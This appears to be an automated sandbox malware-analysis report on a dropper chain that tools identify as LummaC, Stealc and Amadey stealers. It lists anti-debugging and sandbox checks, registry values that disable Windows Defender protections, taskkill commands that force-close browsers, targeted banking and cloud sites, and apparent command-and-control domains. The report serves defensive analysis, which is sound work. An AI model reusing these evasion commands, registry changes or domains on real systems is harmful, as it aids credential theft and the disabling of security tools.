Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe, 00000003.00000003.2301043887.000000000160B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 09d417a7c4.exe, 0000000B.00000003.2801877590.0000000005DCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 353ab0ae6e.exe, 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW=
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0BSU3F1DFM4GF1Y0TBRRGTML6V.exe, 00000003.00000002.2329818033.0000000000F08000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000004.00000002.2351423300.0000000000B88000.00000040.00000001.01000000.00000009.sdmp, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357035123.00000000004B8000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000006.00000002.2370437458.0000000000B88000.00000040.00000001.01000000.00000009.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000000.2328464315.0000000000DD8000.00000080.00000001.01000000.0000000B.sdmp, A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000002.2471952944.0000000000DD8000.00000040.00000001.01000000.0000000B.sdmp, 353ab0ae6e.exe, 0000000C.00000002.2826660274.0000000001348000.00000040.00000001.01000000.00000010.sdmp, 09d417a7c4.exe, 00000010.00000002.2933809518.0000000000E16000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 09d417a7c4.exe, 0000000B.00000003.2802119721.0000000005D94000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RETV5V6Q4X285DV6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Code function: 3_2_05620813 rdtsc 3_2_05620813
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Code function: 7_2_00C5B9A8 LdrInitializeThunk, 7_2_00C5B9A8
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\GKAQCOVK40X0NN7A.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: RLX7QEJ1ATLQN8ECDIPHB.exe PID: 2680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 353ab0ae6e.exe PID: 8036, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2098874752.0000000004B30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe "C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe "C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe "C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001245001\num.exe "C:\Users\user\AppData\Local\Temp\1001245001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 29af563a7b.exe, 0000000D.00000002.2894102744.0000000000D92000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2370437458.0000000000B88000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: 5oProgram Manager
Source: firefox.exe, 0000001B.00000002.3029375251.0000005FD943B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: RLX7QEJ1ATLQN8ECDIPHB.exe, RLX7QEJ1ATLQN8ECDIPHB.exe, 00000005.00000002.2357035123.00000000004B8000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: oProgram Manager
Source: A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe, 00000007.00000002.2472572466.0000000000E2C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RLX7QEJ1ATLQN8ECDIPHB.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001244001\29af563a7b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001245001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001245001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001243001\353ab0ae6e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\SOZIL3CYM3GR68KV3Z4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001245001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1B0VWLBQG1NHHVW3B7EOUSWCWB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: 09d417a7c4.exe, 0000000B.00000003.2913281194.0000000001469000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.2912913230.0000000001464000.00000004.00000020.00020000.00000000.sdmp, 09d417a7c4.exe, 0000000B.00000003.3010399483.000000000146B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001242001\09d417a7c4.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 33.2.RETV5V6Q4X285DV6.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.0BSU3F1DFM4GF1Y0TBRRGTML6V.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2329238363.0000000000D11000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2351037626.0000000000991000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2310001916.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2329802487.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2370281084.0000000000991000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2288969825.0000000005410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2631105456.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3030295147.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3071469840.00000000000B1000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000D.00000003.2892795136.000000000189F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 29af563a7b.exe PID: 2792, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 09d417a7c4.exe PID: 7836, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 39.2.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RLX7QEJ1ATLQN8ECDIPHB.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.353ab0ae6e.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.SOZIL3CYM3GR68KV3Z4.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.353ab0ae6e.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.3142989520.0000000000771000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3147195806.000000000158E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2897071906.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2828087899.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3188496259.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2785659167.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3055944395.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898017549.0000000000AB1000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2316405109.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3041756077.0000000000F61000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2950368686.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2356707937.00000000000D1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2357660473.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3191784603.0000000001717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2826208289.0000000000F61000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
